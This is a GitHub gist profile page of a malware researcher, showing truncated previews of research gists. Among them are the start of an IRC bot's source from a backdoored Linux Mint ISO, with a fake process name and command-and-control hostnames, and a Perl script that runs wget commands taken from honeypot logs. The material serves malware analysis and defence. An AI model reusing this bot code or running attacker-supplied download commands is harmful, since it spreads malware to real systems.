Skip to content

Instantly share code, notes, and snippets.

unixfreaxjp unixfreaxjp

  • blueteamer inc
Block or report user

Report or block unixfreaxjp

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
View yet another radare2 cheatsheet.md

radare2

load without any analysis (file header at offset 0x0): r2 -n /path/to/file

  • analyze all: aa
  • show sections: iS
  • list functions: afl
  • list imports: ii
  • list entrypoints: ie
  • seek to function: s sym.main
View keybase.md

Keybase proof

I hereby claim:

  • I am unixfreaxjp on github.
  • I am unixfreaxjp (https://keybase.io/unixfreaxjp) on keybase.
  • I have a public key whose fingerprint is BF89 F24B E57A 81B1 B93A 99CC B9AD 3D5B EC61 AB91

To claim this, I am signing this object:

@unixfreaxjp
unixfreaxjp / uiwixpanel.sh
Last active May 18, 2017 — forked from m0rb/uiwixpanel.sh
uiwix payment gateway crawler
View uiwixpanel.sh
#!/bin/bash
# deps: tesseract, torify, curl
# use seq and GNU parallel to speed up crawling
# ex - $ seq 1000000000 2000000000 | parallel --jobs +20 ./uiwixcrawl.sh {}
# 5/17/17 - chris_commat_misentropic_commercial
URL="http://4ujngbdqqm6t2c53.onion"
grab() {
torify curl -s $@ -H 'Host: 4ujngbdqqm6t2c53.onion' -H \
@unixfreaxjp
unixfreaxjp / twitter-block-user.py
Created Mar 14, 2016 — forked from grcninja/twitter-block-user.py
Simple script to block annoying twitter spammers. Requires twitter API codes.
View twitter-block-user.py
#!/usr/bin/env python
#Python3.4.3 compatable
#All the credit for this goes to the original author 00101010b.
#I just added a for loop and list of possible account names.
# Import TwitterAPI
# you can install this library via the commandline:
# $ pip install --user TwitterAPI
from TwitterAPI import TwitterAPI
@unixfreaxjp
unixfreaxjp / man.cy
Created Feb 21, 2016 — forked from kurobeats/man.cy
man.cy from malicious Linux Mint iso
View man.cy
#define STARTUP 1
#undef IDENT // Only enable this if you absolutely have to
#define FAKENAME "apt-cache" // What you want this to hide as
#define CHAN "#mint" // Channel to join
#define KEY "bleh" // The key of the channel
int numservers=5; // Must change this to equal number of servers down there
char *servers[] = {
"updates.absentvodka.com",
"updates.mintylinux.com",
"eggstrawdinarry.mylittlerepo.com",
@unixfreaxjp
unixfreaxjp / AES.java
Created Feb 20, 2016 — forked from ymnk/AES.java
JSch examples
View AES.java
/* -*-mode:java; c-basic-offset:2; indent-tabs-mode:nil -*- */
/**
* This program will demonstrate how to use "aes128-cbc".
*
*/
import com.jcraft.jsch.*;
import java.awt.*;
import javax.swing.*;
public class AES{
View gwfl.pl
#!/usr/bin/perl
# A simple Perl-script to extract and execute wget commands from a log
# I wrote it originally for Kippo because it downloads only if wget
# goes to port 80 but it's maybe capable of some other
# usecases. I call it gwfl for "get wget from log"
#
# Don't forget to install missing packages from CPAN with "cpan" or
# your package manager
use strict;
u
View ChinaIPtoBlock.js
#MalwareMustDie friends, for completely blocking China and Hongkong IP, this is my list for hosts.allow (deny)
#See our video disclosure here for the reason why: http://blog.malwaremustdie.org/2014/11/china-elf-botnet-malware-infection.html
#Last update: Sat Nov 22 03:06:22 JST 2014 from unixfreaxjp
#Shared under: WTFPL License: http://en.wikipedia.org/wiki/WTFPL
#Bound to legal disclaimer: http://blog.malwaremustdie.org/p/the-rule-to-share-malicious-codes-we.html
#Todo: Purging data is scheduled in Jan 2015. Updated per crusade basis.
#Message: Excluded IP segment & FP report is appreciated.
#host deny rules (generic OS, Windows users can change "sshd:" into "ALL:")
sshd : 1.80.0.0/13 : deny
View mwlist.txt
# This list summarizes malware caught in my Kippo SSH Honeypot
#
# For detailed instructions, please see:
# https://blog.ls20.com/check-your-server-for-malware-from-ssh-brute-force-attacks/
#
# Last Updated: November 1, 2014
#
# Copyright (C) 2014 Lin Song
#
# This program is free software: you can redistribute it and/or modify it under
View MMD-mayhem-perl-extractor.cgi
#!/usr/bin/perl
use Config;
$SO32="\x7f\x45\x4c\x46\x01\..x00";
$SO64="\x7f\x45\x4c\x46\x02\..x00";
# detect system - use as per malware code technique,a buggy unreliable method.
$name = "%helper";
open F, $name and binmode F and read (F, $buf, 8) and close F;
@b = unpack("C*", $buf);
You can’t perform that action at this time.